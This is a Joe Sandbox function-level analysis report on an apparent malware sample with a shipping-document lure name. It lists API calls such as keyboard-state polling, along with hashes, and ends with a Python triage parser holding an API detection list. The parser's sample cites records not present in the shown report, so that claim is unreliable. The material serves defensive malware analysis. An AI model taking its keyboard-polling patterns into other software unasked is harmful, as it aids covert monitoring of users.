                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: b81d62dd2d5fc7af6c9a6d030d6865a69a6fbaa6b291f9d103666f61f6ebbb4e
                    • Instruction ID: 0e3da3ddfb10b865f2a51b180aa658c5e33601d17c3556bb94e02024d4f8b8b9
                    • Opcode Fuzzy Hash: b81d62dd2d5fc7af6c9a6d030d6865a69a6fbaa6b291f9d103666f61f6ebbb4e
                    • Instruction Fuzzy Hash: 18B1EA75A00109AFDB04DFA5DC88DAEBBF9FF88314B149469E909EB261DB30ED45CB50
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00E603C8
                    • SetKeyboardState.USER32(?), ref: 00E60433
                    • GetAsyncKeyState.USER32(000000A0), ref: 00E60453
                    • GetKeyState.USER32(000000A0), ref: 00E6046A
                    • GetAsyncKeyState.USER32(000000A1), ref: 00E60499
                    • GetKeyState.USER32(000000A1), ref: 00E604AA
                    • GetAsyncKeyState.USER32(00000011), ref: 00E604D6
                    • GetKeyState.USER32(00000011), ref: 00E604E4
                    • GetAsyncKeyState.USER32(00000012), ref: 00E6050D
                    • GetKeyState.USER32(00000012), ref: 00E6051B
                    • GetAsyncKeyState.USER32(0000005B), ref: 00E60544
                    • GetKeyState.USER32(0000005B), ref: 00E60552
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
                    • Instruction ID: bcf1a60be4a92c121e24e5b1269fdeb680a91ad37e34469f48180bb7822d3c7a
                    • Opcode Fuzzy Hash: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
                    • Instruction Fuzzy Hash: 8551C720A887A42AFB35DBA094107AFBFF49F013C4F489599D5C2761C3DA649F4CCB61
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 00E5C545
                    • GetWindowRect.USER32(00000000,?), ref: 00E5C557
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E5C5B5
                    • GetDlgItem.USER32(?,00000002), ref: 00E5C5C0
                    • GetWindowRect.USER32(00000000,?), ref: 00E5C5D2
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E5C626
                    • GetDlgItem.USER32(?,000003E9), ref: 00E5C634
                    • GetWindowRect.USER32(00000000,?), ref: 00E5C645
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E5C688
                    • GetDlgItem.USER32(?,000003EA), ref: 00E5C696
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E5C6B3
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00E5C6C0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
                    • Instruction ID: 566fc56ac5691da7f8b701d152660bdca14baffa442118e468bb18808f3593f3
                    • Opcode Fuzzy Hash: 54914cc4a1e988d0085964c3352a25220ee27b3eb3f874c1cfd4fe41544e56aa
                    • Instruction Fuzzy Hash: 9D51A370B00305AFDB08CFA9DD95AAEBBB5EF88711F24852DF919E7290D7B09D048B50
                    APIs
                      • Part of subcall function 00E01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02036,?,00000000,?,?,?,?,00E016CB,00000000,?), ref: 00E01B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E020D3
                    • KillTimer.USER32(-00000001,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E0216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00E3BE26
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BE57
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BE6E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E016CB,00000000,?,?,00E01AE2,?,?), ref: 00E3BE8A
                    • DeleteObject.GDI32(00000000), ref: 00E3BE9C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: e99f04497dc49b29196d218b8f1b8fe23a0a6b39a18cf6cf740c42a8ae732c46
                    • Instruction ID: 5e92796b4288515179b6546f83cff1fcbc5ad524c66ede486178ea406aa33a47
                    • Opcode Fuzzy Hash: e99f04497dc49b29196d218b8f1b8fe23a0a6b39a18cf6cf740c42a8ae732c46
                    • Instruction Fuzzy Hash: 7A617C32101B00DFDB299F1AD94CB6A7BF1FB40315F50A42DE646BA9A0C772A8D5DB80
                    APIs
                      • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                    • GetSysColor.USER32(0000000F), ref: 00E021D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 034ebad2b6432d5aaf2f64f97a20b92c978b5739e8ee00893352a53f34dadd2d
                    • Instruction ID: 45a9c1f602b709130d533499711335fb7e8b7df16df1589d3ae057d241cfab07
                    • Opcode Fuzzy Hash: 034ebad2b6432d5aaf2f64f97a20b92c978b5739e8ee00893352a53f34dadd2d
                    • Instruction Fuzzy Hash: DC41BF31100140EEDB255FA8EC4CBB93BA1EB16325F245269FE65AA1F2C7318CC6DB21
                    APIs
                    • CharLowerBuffW.USER32(?,?,00E8F910), ref: 00E6A995
                    • GetDriveTypeW.KERNEL32(00000061,00EB89A0,00000061), ref: 00E6AA5F
                    • _wcscpy.LIBCMT ref: 00E6AA89
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 8fcf141cad7f2babc9315f0dea4ee15128e890b7a8e3568bacb97c692bc5e687
                    • Instruction ID: 18eb6e92f2ee07506176448f0b3be42dbbb4da3e31a1090871250f1004cf59ee
                    • Opcode Fuzzy Hash: 8fcf141cad7f2babc9315f0dea4ee15128e890b7a8e3568bacb97c692bc5e687
                    • Instruction Fuzzy Hash: 0051AB305483019BC710EF14E9D2AABB7E9EF84344F18682EF496772E2DB309949CB53
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: 80a2868d01d1fef7fc7cc68556d20aa3037f45e6a1a49d19754312f527574538
                    • Instruction ID: eea38ee871b9b6a46ad8b4191f2cd3472557fae64bd72ddc23aec006ba3134da
                    • Opcode Fuzzy Hash: 80a2868d01d1fef7fc7cc68556d20aa3037f45e6a1a49d19754312f527574538
                    • Instruction Fuzzy Hash: D3410671A04205AFEB289F74DC46A7677E8EF44304F60646EE549F62D3EA319D81CB10
                    APIs
                    • _memset.LIBCMT ref: 00E8719C
                    • CreateMenu.USER32 ref: 00E871B7
                    • SetMenu.USER32(?,00000000), ref: 00E871C6
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87253
                    • IsMenu.USER32(?), ref: 00E87269
                    • CreatePopupMenu.USER32 ref: 00E87273
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E872A0
                    • DrawMenuBar.USER32 ref: 00E872A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 145b8f019ca28893bb16aaeb3db6ede4205c905b1866b4b28854d2652f5b355d
                    • Instruction ID: bf902dcc804e063eee1d28732e4e68384ec330580db5d125c498db7bf25cd056
                    • Opcode Fuzzy Hash: 145b8f019ca28893bb16aaeb3db6ede4205c905b1866b4b28854d2652f5b355d
                    • Instruction Fuzzy Hash: 794135B5A01209EFDB10EF65D888A9A7BF9FF49300F244129F949A7360D731AD14CBA0
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E87590
                    • CreateCompatibleDC.GDI32(00000000), ref: 00E87597
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E875AA
                    • SelectObject.GDI32(00000000,00000000), ref: 00E875B2
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E875BD
                    • DeleteDC.GDI32(00000000), ref: 00E875C6
                    • GetWindowLongW.USER32(?,000000EC), ref: 00E875D0
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E875E4
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E875F0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: ed867901f020f9cf73b67c17645e129e8b9aed5252e4f4f28ff7306eed3aca8c
                    • Instruction ID: 7e79e60d26b6877c8d9dd6e7f71a24f88bf39d9840d502f37630a3c6d48d8392
                    • Opcode Fuzzy Hash: ed867901f020f9cf73b67c17645e129e8b9aed5252e4f4f28ff7306eed3aca8c
                    • Instruction Fuzzy Hash: 90318C72105214AFDF11AFA5DC08FDA3B69EF09325F201224FA5DB60A0C731D854DBA0
                    APIs
                    • _memset.LIBCMT ref: 00E26FBB
                      • Part of subcall function 00E28CA8: __getptd_noexit.LIBCMT ref: 00E28CA8
                    • __gmtime64_s.LIBCMT ref: 00E27054
                    • __gmtime64_s.LIBCMT ref: 00E2708A
                    • __gmtime64_s.LIBCMT ref: 00E270A7
                    • __allrem.LIBCMT ref: 00E270FD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E27119
                    • __allrem.LIBCMT ref: 00E27130
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2714E
                    • __allrem.LIBCMT ref: 00E27165
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E27183
                    • __invoke_watson.LIBCMT ref: 00E271F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                    • Instruction ID: 6c56220cda8446ecf4053f9be77c62768d993a225571964a8e63f1a6013def93
                    • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                    • Instruction Fuzzy Hash: 0D710871A01726ABEB149F79EC42B6AB7E8AF01324F146229F554F7281EB70ED50C7D0
                    APIs
                    • _memset.LIBCMT ref: 00E6283A
                    • GetMenuItemInfoW.USER32(00EC5890,000000FF,00000000,00000030), ref: 00E6289B
                    • SetMenuItemInfoW.USER32(00EC5890,00000004,00000000,00000030), ref: 00E628D1
                    • Sleep.KERNEL32(000001F4), ref: 00E628E3
                    • GetMenuItemCount.USER32(?), ref: 00E62927
                    • GetMenuItemID.USER32(?,00000000), ref: 00E62943
                    • GetMenuItemID.USER32(?,-00000001), ref: 00E6296D
                    • GetMenuItemID.USER32(?,?), ref: 00E629B2
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E629F8
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62A0C
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62A2D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: e920aa8671ab5e93446aaf6733fb5979915491bedc29f536aad53de8018575be
                    • Instruction ID: e5cff2410a28460829a2f2147b88fef11442bcb43940c6bf1348bb1cee8751ac
                    • Opcode Fuzzy Hash: e920aa8671ab5e93446aaf6733fb5979915491bedc29f536aad53de8018575be
                    • Instruction Fuzzy Hash: E761D370940A49AFDB25CFA4EC88DBE7BB8EB84388F14106DFA41B7251D771AD45DB20
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E86FD7
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E86FDA
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E86FFE
                    • _memset.LIBCMT ref: 00E8700F
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E87021
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E87099
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 53a3b0b1f20006318224dbc6bcd9c3a3f1444f7652e70f27ef2375e11e4f3d87
                    • Instruction ID: 39d1f87dd5809a55828f1dc9ee933e5aca3eb5c9997453cbbd7a5ed2dbff1f32
                    • Opcode Fuzzy Hash: 53a3b0b1f20006318224dbc6bcd9c3a3f1444f7652e70f27ef2375e11e4f3d87
                    • Instruction Fuzzy Hash: 48618F71A00208AFDB10DFA4CC85EEE77F8EB09704F14016AFA58BB2A1C771AD45DB50
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E56F15
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00E56F6E
                    • VariantInit.OLEAUT32(?), ref: 00E56F80
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E56FA0
                    • VariantCopy.OLEAUT32(?,?), ref: 00E56FF3
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E57007
                    • VariantClear.OLEAUT32(?), ref: 00E5701C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00E57029
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E57032
                    • VariantClear.OLEAUT32(?), ref: 00E57044
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E5704F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: 61058266554206b86cd02dcfaf76c7a9d265317fcbf760ce862cbe8cc1b00eb0
                    • Instruction ID: d8ef007335679040fbe7ce19ff0a49f8f802acc92bf950ce6aa3fb8ecfbbd7eb
                    • Opcode Fuzzy Hash: 61058266554206b86cd02dcfaf76c7a9d265317fcbf760ce862cbe8cc1b00eb0
                    • Instruction Fuzzy Hash: 88414235A002199FCB04DFA5D844DAEBBF9FF48355F009469E959F7261CB30A949CFA0
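The function records above all follow one layout: an "APIs" list of "Name.MODULE(args), ref: ADDR" lines (callee APIs marked "Part of subcall function"), then "Memory Dump Source" and "Similarity" key/value lines ending in the Opcode and Instruction Fuzzy Hashes. When triaging a report like this one, the useful moves are to pull the per-function API sets out of the text, bucket them (keyboard-state polling, ICMP/socket use, window automation), and keep the Instruction Fuzzy Hash as the pivot key for matching the same function across reports of other samples. The parser below is an added example, not Joe Sandbox tooling: the CATEGORIES buckets are this example's own assumptions, and SAMPLE is a constructed input condensed from three of the records above (keyboard state, the SHBrowseForFolder record with its subcall line, and the truncated Ping record, which has no fuzzy hash).

```python
"""Parse Joe Sandbox per-function records ("APIs" / "Memory Dump Source" /
"Similarity" blocks) and tag API categories for triage.  Added example, not
Joe Sandbox tooling; CATEGORIES and SAMPLE are this example's own."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the report's
# "Part of subcall function ADDR:" marker for APIs reached through a callee.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Key: value" lines (Source File, API ID, Instruction Fuzzy Hash, ...).
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Assumed triage buckets (this example's choice, not a Joe Sandbox taxonomy).
CATEGORIES: Dict[str, Set[str]] = {
    "keyboard_state": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState",
                       "SetKeyboardState"},
    "network": {"WSAStartup", "gethostbyname", "gethostname", "inet_addr",
                "inet_ntoa", "IcmpCreateFile", "IcmpSendEcho"},
    "window_automation": {"EnumThreadWindows", "FindWindowExW",
                          "SetActiveWindow", "EndDialog"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # callee address for "Part of subcall" lines


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # repeated keys: last wins

    @property
    def api_names(self) -> Set[str]:
        return {c.name for c in self.calls}

    @property
    def instruction_fuzzy_hash(self) -> Optional[str]:
        return self.fields.get("Instruction Fuzzy Hash")

    def categories(self) -> Set[str]:
        return {cat for cat, names in CATEGORIES.items() if self.api_names & names}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text at each "APIs" header into FunctionRecords."""
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            if cur.calls or cur.fields:
                records.append(cur)
            cur = FunctionRecord()
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                     m.group("ref"), m.group("sub")))
            continue
        m = FIELD_LINE.match(line)
        if m:  # bare section headers ("Similarity", "Strings") match neither
            cur.fields[m.group("key")] = m.group("val").strip()
    if cur.calls or cur.fields:
        records.append(cur)
    return records


def triage(records: List[FunctionRecord]):
    """(index, sorted categories, Instruction Fuzzy Hash) for each record that hits."""
    return [(i, sorted(r.categories()), r.instruction_fuzzy_hash)
            for i, r in enumerate(records) if r.categories()]


def index_by_fuzzy_hash(records: List[FunctionRecord]) -> Dict[str, List[FunctionRecord]]:
    """Pivot key for matching the same function across reports of other samples."""
    idx = defaultdict(list)
    for r in records:
        if r.instruction_fuzzy_hash:
            idx[r.instruction_fuzzy_hash].append(r)
    return dict(idx)


# Constructed sample: three records condensed from the report above.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00E603C8
• GetAsyncKeyState.USER32(000000A0), ref: 00E60453
• GetKeyState.USER32(000000A0), ref: 00E6046A
Memory Dump Source
• Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Instruction Fuzzy Hash: 8551C720A887A42AFB35DBA094107AFBFF49F013C4F489599D5C2761C3DA649F4CCB61
APIs
  • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
• CoInitialize.OLE32(00000000), ref: 00E6D676
• SHBrowseForFolderW.SHELL32(?), ref: 00E6D8A9
Similarity
• API String ID: 1246142700-0
• Instruction Fuzzy Hash: 18B1EA75A00109AFDB04DFA5DC88DAEBBF9FF88314B149469E909EB261DB30ED45CB50
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00E758A9
• gethostbyname.WSOCK32(?), ref: 00E758FA
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75978
Strings
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
"""
```

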